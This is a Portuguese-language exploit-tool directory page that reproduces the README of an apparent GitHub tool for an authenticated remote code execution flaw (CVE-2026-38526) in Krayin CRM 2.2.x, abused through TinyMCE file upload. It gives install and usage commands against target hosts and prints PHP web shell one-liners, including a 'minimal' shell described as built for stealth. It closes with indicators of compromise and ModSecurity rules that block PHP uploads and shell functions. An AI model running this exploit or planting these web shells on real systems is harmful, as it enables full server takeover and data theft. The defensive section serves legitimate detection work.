Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingGeração de Shellcode
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 exploit para Krayin CRM v2.2.x - RCE autenticado via bypass de upload de arquivo TinyMCE. Recursos: shell interativo, payloads de múltiplos tipos, geração automática de shell e verificação. Autor: Sudeepa Wanigarathna. Apenas para testes autorizados.

Ver Repositório
3há 1 mêsAinda não revisado

🔓 Krayin CRM v2.2.x - Exploração de Execução Remota de Código Autenticada

License: MIT CVE-2026-38526

⚠️ APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS - O uso não autorizado é ilegal e antiético.

📋 Visão Geral

Esta ferramenta de exploração demonstra uma vulnerabilidade crítica de execução remota de código (RCE) autenticada descoberta no Krayin CRM versão 2.2.x. A vulnerabilidade existe na funcionalidade de upload de arquivos do TinyMCE, que permite que administradores autenticados enviem e executem código PHP arbitrário no servidor.

PropriedadeValor
ID CVECVE-2026-38526
Software AfetadoKrayin CRM v2.2.x
Tipo de VulnerabilidadeExecução Remota de Código Autenticada (RCE)
Autenticação NecessáriaSim (acesso nível Admin)
ImpactoComprometimento completo do sistema
Pontuação CVSS8.8 (Alto)

🚨 Detalhes da Vulnerabilidade

A vulnerabilidade decorre de validação insuficiente do tipo de arquivo no endpoint de upload do TinyMCE (/admin/tinymce/upload). Um administrador autenticado pode:

  • Enviar um arquivo PHP disfarçado com um tipo MIME de imagem.
  • O arquivo é armazenado em um local acessível pela web.
  • O atacante pode então executar código PHP arbitrário no servidor.

Versões Afetadas

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Todas as versões 2.2.x antes do lançamento do patch

✨ Recursos

  • Múltiplos Tipos de Shell: Básico, Avançado, Mínimo, Gerenciador de Arquivos e Personalizado.
  • Shell Interativo: Interface completa semelhante a terminal com histórico de comandos.
  • Upload de Arquivos: Enviar arquivos adicionais através do shell.
  • Extração de Token CSRF: Tratamento automático da proteção CSRF.
  • Suporte a Proxy: Roteamento de tráfego através de proxies HTTP/HTTPS.
  • Formatos de Saída Flexíveis: Texto, JSON ou modo Silencioso.
  • Lógica de Repetição: Repetição automática em caso de falhas de conexão.
  • Cabeçalhos Personalizados: Suporte para cabeçalhos HTTP personalizados.
  • Modo Detalhado: Saída de depuração detalhada.
  • Suporte SSL: Verificação opcional de certificado SSL.

📦 Instalação

Requisitos

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Instalação Rápida

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

Arquivo de Requisitos (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Uso

Sintaxe Básica do Comando

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <SENHA> [OPÇÕES]

Parâmetros Obrigatórios

Exemplos Comuns de Uso

root@kitploit:~
# Exploração básica com shell gerado
python3 exploit.py -t http://target.com -u [email protected] -p password

# Enviar arquivo PHP personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Gerar shell avançado com modo interativo
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Gerar arquivo shell sem exploração
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Usar com proxy para teste/depuração
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Saída JSON para automação
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Modo detalhado com timeout personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# User-Agent e cabeçalhos personalizados
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Tipos de Shell

  1. Shell Básico (basic) Execução simples de comando com a função system().

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Shell Avançado (advanced) Shell rico em recursos com:

    • Múltiplos métodos de execução de comandos
    • Interface web bonita semelhante a terminal
    • Suporte a histórico de comandos
    • Exibição do usuário atual e nome do host
  3. Shell Mínimo (minimal) Pegada mínima para furtividade.

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. Gerenciador de Arquivos (file_manager) Interface completa de gerenciamento de arquivos:

    • Upload de arquivos
    • Exclusão de arquivos
    • Criação de diretórios
    • Navegação
    • Visualizador de permissões de arquivos
  5. Shell Personalizado (custom) Use seu próprio arquivo PHP shell com o parâmetro -f.

📝 Formatos de Saída

Formato Texto (Padrão)

Saída colorida legível por humanos, adequada para uso interativo.

Formato JSON (-o json)

Formato legível por máquina para automação e integração.

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Formato Silencioso (-q, --quiet)

Nenhuma saída, exceto erros. Útil para processamento em lote.

⚙️ Opções Avançadas

Exemplo de Cabeçalhos Personalizados

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Detecção e Prevenção

Sinais de Comprometimento (IoC)

  • Arquivos a Monitorar:

    • Arquivos PHP incomuns em public/storage/upload/
    • Arquivos com extensões duplas (ex.: image.php.jpg)
    • Novos arquivos com nomes suspeitos
  • Logs a Verificar:

    • Requisições POST para /admin/tinymce/upload
    • Horários incomuns de login de administrador
    • Tentativas de autenticação com falha
  • Indicadores do Sistema:

    • Processos inesperados em execução
    • Novos cron jobs
    • Arquivos do sistema modificados

Medidas de Prevenção

  • Ações Imediatas:

    root@kitploit:~
    # Atualizar para versão corrigida
    composer update krayin/crm
    
    # Desabilitar acesso admin temporariamente
    # Remover contas admin desnecessárias
    # Alterar todas as senhas de admin
    
  • Reforço no Upload de Arquivos:

    root@kitploit:~
    // Validar tipo de arquivo pelo conteúdo, não apenas pela extensão
    // Implementar política de segurança de conteúdo
    // Usar Firewall de Aplicação Web (WAF)
    // Habilitar varredura de upload de arquivos
    
  • Controle de Acesso:

    root@kitploit:~
    # Restringir IPs de admin no .htaccess
    # Implementar MFA para contas admin
    # Auditoria regular de administradores
    # Políticas de tempo limite de sessão
    
  • Regras WAF (ModSecurity):

    root@kitploit:~
    # Bloquear uploads suspeitos de arquivos
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # Bloquear web shells
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    

🛡️ Divulgação Responsável

Esta vulnerabilidade foi descoberta através de pesquisa de segurança responsável. O processo de divulgação seguiu estas etapas:

  • Descoberta: Vulnerabilidade identificada durante avaliação de segurança.
  • Verificação: Vulnerabilidade confirmada no Krayin CRM 2.2.x.
  • Relatório: Notificados os desenvolvedores do Krayin CRM de forma privada.
  • Coordenação: Trabalhou-se com a equipe para desenvolver uma correção.
  • Patch: Aguardando lançamento oficial do patch.
  • Divulgação: Divulgação pública após disponibilidade do patch.

Cronograma

  • Descoberta: TBD
  • Relatado: TBD
  • Patch Lançado: TBD
  • Divulgação Pública: TBD

📜 Aviso Legal

root@kitploit:~
ESTE SOFTWARE É FORNECIDO "COMO ESTÁ" E TODAS AS GARANTIAS EXPRESSAS OU IMPLÍCITAS,
INCLUINDO, MAS NÃO SE LIMITANDO ÀS GARANTIAS IMPLÍCITAS DE COMERCIALIZAÇÃO
E ADEQUAÇÃO A UM FIM ESPECÍFICO SÃO REJEITADAS. EM NENHUMA HIPÓTESE O
AUTOR SERÁ RESPONSÁVEL POR QUAISQUER DANOS DIRETOS, INDIRETOS, INCIDENTAIS,
ESPECIAIS, EXEMPLARES OU CONSEQUENCIAIS DECORRENTES DO USO DESTE SOFTWARE.

O USO DESTA FERRAMENTA PARA QUALQUER FIM QUE NÃO SEJA TESTE DE SEGURANÇA AUTORIZADO
É ILEGAL E ANTIÉTICO. O AUTOR NÃO ASSUME NENHUMA RESPONSABILIDADE POR
USO NÃO AUTORIZADO OU QUAISQUER DANOS CAUSADOS POR ESTA FERRAMENTA.

🔧 Solução de Problemas

Problemas Comuns

  • Problema: Falha na autenticação

    • Solução: Verifique as credenciais, confirme se o caminho de login do admin é /admin/login
    • Verifique: Garanta que a extração do token CSRF funcione corretamente
  • Problema: Upload de arquivo falha

    • Solução: Verifique as permissões de arquivo, confirme se o endpoint de upload existe
    • Verifique: Certifique-se de que o alvo usa o editor TinyMCE
  • Problema: Shell não executa comandos

    • Solução: Verifique se as funções PHP não estão desabilitadas no php.ini
    • Verifique: Teste com um comando simples como echo test
  • Problema: Erros de certificado SSL

    • Solução: Use a flag --verify-ssl ou desabilite a verificação
    • Nota: Certificados autoassinados causarão erros sem verificação adequada

Modo de Depuração

root@kitploit:~
# Habilitar log detalhado
python3 exploit.py -t http://target.com -u admin -p pass -v

# Com proxy (Burp Suite, etc.)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 Contribuindo

Contribuições são bem-vindas! Por favor, garanta:

  • Todo o código seja devidamente testado.
  • A documentação seja atualizada.
  • As diretrizes éticas sejam seguidas.
  • A pesquisa de vulnerabilidades seja conduzida de forma responsável.

📚 Referências

  • Site Oficial do Krayin CRM
  • CVE-2026-38526
  • OWASP Execução Remota de Código
  • Melhores Práticas de Segurança PHP

⭐ Suporte

Se você achar esta ferramenta útil para pesquisa de segurança, considere:

  • ⭐ Favoritar o repositório
  • 🔔 Seguir para atualizações
  • 📢 Compartilhar com outros pesquisadores de segurança

Criado com ❤️ para Pesquisa de Segurança

Lembre-se: Grande poder vem com grande responsabilidade. Use este conhecimento com sabedoria!

📊 Cartão de Referência Rápida de Comandos

root@kitploit:~
# Referência rápida
python3 exploit.py -t URL -u USER -p SENHA [OPÇÕES]

# Opções:
#   -f ARQUIVO        Enviar shell personalizado
#   --shell-type TIPO Básico|Avançado|Mínimo|Gerenciador_de_Arquivos|Personalizado
#   -i                Modo interativo
#   --proxy URL       Proxy HTTP
#   -v                Saída detalhada
#   -o json           Saída JSON
#   --generate-only   Criar shell sem explorar
#   --timeout SEG     Timeout da requisição
#   --retry N         Número de tentativas
#   --user-agent UA   User-Agent personalizado
#   --header "C: V"   Cabeçalhos personalizados
#   --verify-ssl      Verificar certificados SSL
#   -q, --quiet       Suprimir saída

🔒 Lembre-se: Sempre obtenha permissão por escrito antes de testar qualquer sistema!

Baixar ferramenta
ParâmetroDescrição
-t, --targetURL do alvo (ex.: http://192.168.1.100)
-u, --usernameNome de usuário ou e-mail do admin
-p, --passwordSenha do administrador
OpçãoDescriçãoPadrão
--timeoutTempo limite da requisição em segundos30
--retryNúmero de tentativas de repetição3
--retry-delayAtraso entre tentativas em segundos2
--user-agentString User-Agent personalizadaUA do navegador padrão
--headerCabeçalhos HTTP personalizados (Chave: Valor)Nenhum
--verify-sslVerificar certificados SSLFalse
--proxyURL do proxy HTTP/HTTPSNenhum
-v, --verboseHabilitar saída de depuraçãoFalse
-q, --quietSuprimir toda a saídaFalse